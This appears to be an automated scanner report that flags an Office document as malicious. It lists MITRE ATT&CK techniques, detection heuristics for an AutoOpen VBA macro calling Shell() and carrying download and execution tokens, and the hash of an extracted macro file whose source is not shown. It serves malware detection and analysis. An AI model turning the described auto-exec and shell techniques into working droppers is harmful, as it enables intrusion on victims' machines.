Verdict: MALICIOUS (Risk Score 182)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the high heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate that the AutoOpen macro attempts to execute arbitrary code using the Shell() function. This is a common technique for downloading and executing further stages of malware.
Heuristics (6)
- VBA macros detected (medium; 3 related findings): OLE_VBA_MACROS. Document contains VBA macro code.
- Shell() call in VBA (critical): OLE_VBA_SHELL. Shell() call in VBA.
- AutoOpen macro (high): OLE_VBA_AUTOOPEN. AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high): OLE_VBA_PCODE_AUTOEXEC_EXEC. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium): OLE_LEGACY_WORDBASIC_AUTOEXEC. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info): EMBEDDED_URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9291 bytes |

SHA-256 of macros.bas: df4708552beea5fba63eb9fb11179730bd37b02b11d472ccc786cde00dd5d6fa
Preview script: first 1,000 lines of the extracted script (obfuscated VBA source, truncated in this report).